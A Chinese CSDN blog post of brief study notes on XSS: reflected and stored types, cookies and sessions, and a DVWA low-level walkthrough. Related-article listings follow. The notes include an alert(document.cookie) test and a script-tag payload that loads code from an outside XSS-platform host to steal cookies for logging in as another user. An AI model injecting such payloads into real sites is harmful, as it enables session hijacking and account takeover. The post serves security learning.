XSS

最新推荐文章于 2023-06-17 20:35:08 发布
最新推荐文章于 2023-06-17 20:35:08 发布
阅读量169 收藏
点赞数 2
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wst0717/article/details/81571387
版权

反射型xss

输入的参数带人了数据库进行了查询

但是并没有存入到数据库里面

存储型xss

输入的参数带人了数据库进行了查询

并存入到数据库里面

Html表单

javascript

JavaScript 被数百万计的网页用来改进设计、验证表单、检测浏览器、创建cookies,以及更多的应用。

 

<script>alert(document.cookie)</script>

是可以弹出cookie的用法

在显示cookie的地方加入Httponly属性就不会弹框了,也就不会打到cookie了

现在把打到的cookie发送到xss平台

Xss平台创建一个xss打cookie的项目

Dvwa低级别

我们来输入一个payload

 

script src=http://webxss.top/xss/2newbZ?1532658129></script>#

访问

我们就可以用这个别人的cookie来登录网站了

Firebug插件

编辑和重发

 

浏览器具备存储cookie的功能      

Xss是伪造cookie

Csrf是伪造的表单

 

Cookie存储在客户端(浏览器)

Session存在在服务器端

 

客户端浏览器访问服务器的时候,服务器把客户端信息以某种形式记录在服务器上。这就是Session。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。

 

 

 

 

 

 

 

 

 

小蘑菇~~~
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
存储型xss_安全测试之XSS
weixin_39989159的博客
11-29 1627
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
网络安全从入门到精通(第七章-2)存储型XSS详解
划水的小白白
02-07 2049
本文内容: ~如何使用xss平台 ~存储型xss挖掘 ~存储型xss实战注意 每日一句: 安全的所有一切都是基于信任,而做安全的就是不信任一切, 对任何东西都不信任,任何地方都可能是你发挥的战场!
XSS类型
积累,在于坚持
01-18 1002
几种类型 1、反射型XSS 只是简单的把用户输入的数据“反射”给浏览器,即用户输入的参数直接输出到页面上 2、存储型XSS 把用户输入的数据“存储”在服务器上,这类XSS具有很强的稳定性。因此,存储型XSS也可以称之为“持久型XSS”,因为从效果上来看它存在的时间比较长。 3、DOM Based XSS 通过修改页面的DOM节点形成的XSS。也是反射型XSS的一种,因为形成原因比较特别
XSS漏洞详解
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
存储型XSS简介
seek_2022的博客
05-05 1万+
文章目录一、存储型XSS简介(一)存储型XSS的概念(二)存储型XSS攻击过程(三)打XSS的潜在风险二、XSS平台使用方法三、靶场实战 一、存储型XSS简介 (一)存储型XSS的概念 存储型XSS又称持久型XSS,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。反射型XSS的被攻击对象一般是攻击者去寻找的,就比如说:一个攻击者想盗取A的账号,那么攻击者就可以将一个含有反射型XSS的特制URL链接发送给A,然后用花言巧语诱骗A点击链接。当A不小心点进去时,就会立即受到XSS攻击。这种
xss
weixin_46729085的博客
09-26 352
1.xss概念和分类 1.1 什么是xss漏洞 举列: 1.2xss分类 2.存储xss分析 特点:相关数据会在服务器中存储 例如: 1.1攻击方:通过网页注入javascript脚本,代码被浏览器执行,该类型有持久化特点(存储数据库或者物理文件) alert(打印信息); 点击留言按钮 1.2.cookie 原网站: 管理员:登陆 (登录成功后,执行的攻击方的代码)alert(打印信息); ...
关于pdf文件xss攻击问题,配置xssFilter方法
最新发布
12-21
PDF文件XSS攻击问题主要指的是攻击者通过构造恶意的PDF文档,利用其中的脚本语言功能,尝试在用户的浏览器上执行跨站脚本攻击(XSS)。这种攻击方式可能导致敏感信息泄露、用户权限滥用或其他安全风险。在SpringBoot...
免费蓝莲花Bluelotus,XSS工具网安
08-14
【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】【免费】蓝莲花Bluelotus,XSS工具【网安】...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
XSS—存储型xss
wwwwyyyrre的博客
06-17 3216
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射型XSS编写一次代码只能进行一次攻击的特点,存储型XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久型XSS”。存储型XSS比反射型XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射型XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。
存储型XSS
m0_51313985的博客
05-25 6550
持久型/存储型XSS:嵌入到web页面的恶意HTML会被存储到应用服务器端,简而言之就是会被存储到数据库,等用户在打开页面时,会继续执行恶意代码,能够持续的攻击用户; 前面的文章讲到了XSS,但是不清楚弹窗有什么用,在此强调下,弹窗只是证明那个地方存在xss,就和SQL注入单引号报错或者and 1=1;and 1=2一样 xss =>跨站脚本攻击=>前端代码注入=>用户输入的数据会被当做前端代码执行。 存储型:用户输入的数据会被存入数据库,然后页面输出时会被当做前端代码执行。 如果用户输入
XSS跨站脚本攻击(一)----XSS攻击的三种类型
热门推荐
fendo
12-27 12万+
一、简介 什么是XSS? 百度百科的解释: XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。 它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在x
第三节 前端开发基础——JavaScript
qq_33672321的博客
04-05 299
初级拓展1、测验        完成测验:http://www.w3school.com.cn/quiz/quiz.asp?quiz=js ;2、实践        1)相比html,javascript较为复杂。完成实例:http://www.w3school.com.cn/js/ ;        2)完成所有的“亲自试一试”(重点学习JS HTML DOM、JS Window部分);3、掌握...
web常见漏洞解析 注入 xss csrf 文件上传 文件包含 -dvwa演示
joke_ljh的博客
09-14 1407
1.注入 1.1 SQL注入: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 手工注入:联合注入、盲注、延...
未授权访问漏洞总结
七月_的博客
08-20 2万+
Web端 http://219.141.242.77:7777/pe-admin/ #后台未授权访问 http://219.141.242.77:7777/pe-admin/main.jsp 参考:华泰保险某系统漏洞打包(未授权访问\弱口令\Getshell) 服务端 未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被...
XSS攻击应急响应策略
"XSS应急预案已完成" XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况,使得恶意代码能够注入到网页中,并在其他用户加载页面时执行。这些攻击可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值